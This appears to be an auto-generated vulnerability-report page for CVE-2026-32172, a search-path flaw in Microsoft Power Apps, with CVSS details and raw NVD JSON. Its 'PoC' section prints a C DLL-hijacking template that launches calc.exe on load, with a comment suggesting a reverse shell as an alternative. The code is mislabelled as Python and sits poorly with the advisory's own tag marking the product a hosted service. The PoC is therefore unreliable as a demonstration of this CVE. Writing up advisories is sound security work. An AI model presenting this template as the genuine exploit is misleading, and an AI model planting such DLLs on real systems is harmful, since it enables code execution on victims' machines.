Security Vulnerability Report
中文
CVE-2026-32172 CVSS 8.0 HIGH

CVE-2026-32172

Published: 2026-04-23 22:16:34
Last Modified: 2026-04-29 19:11:13

Description

Uncontrolled search path element in Microsoft Power Apps allows an unauthorized attacker to execute code over a network.

CVSS Details

CVSS Score
8.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:microsoft:power_apps:-:*:*:*:*:-:*:* - VULNERABLE
Microsoft Power Apps (具体受影响版本请参考官方安全通告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * PoC for CVE-2026-32172: Uncontrolled Search Path Element * This DLL demonstrates code execution when loaded by the vulnerable app. * Compile as a shared library (DLL) and place in the uncontrolled search path. */ #include <windows.h> #include <stdlib.h> // DllMain entry point BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: // Code execution payload // Example: Launching calc.exe to prove execution WinExec("cmd.exe /c calc.exe", SW_SHOW); // Alternatively, start a reverse shell or custom payload break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32172", "sourceIdentifier": "[email protected]", "published": "2026-04-23T22:16:33.720", "lastModified": "2026-04-29T19:11:12.690", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "Uncontrolled search path element in Microsoft Power Apps allows an unauthorized attacker to execute code over a network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:power_apps:-:*:*:*:*:-:*:*", "matchCriteriaId": "2E54A718-D0E9-4F6C-9B1A-2AD79774A8F1"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32172", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}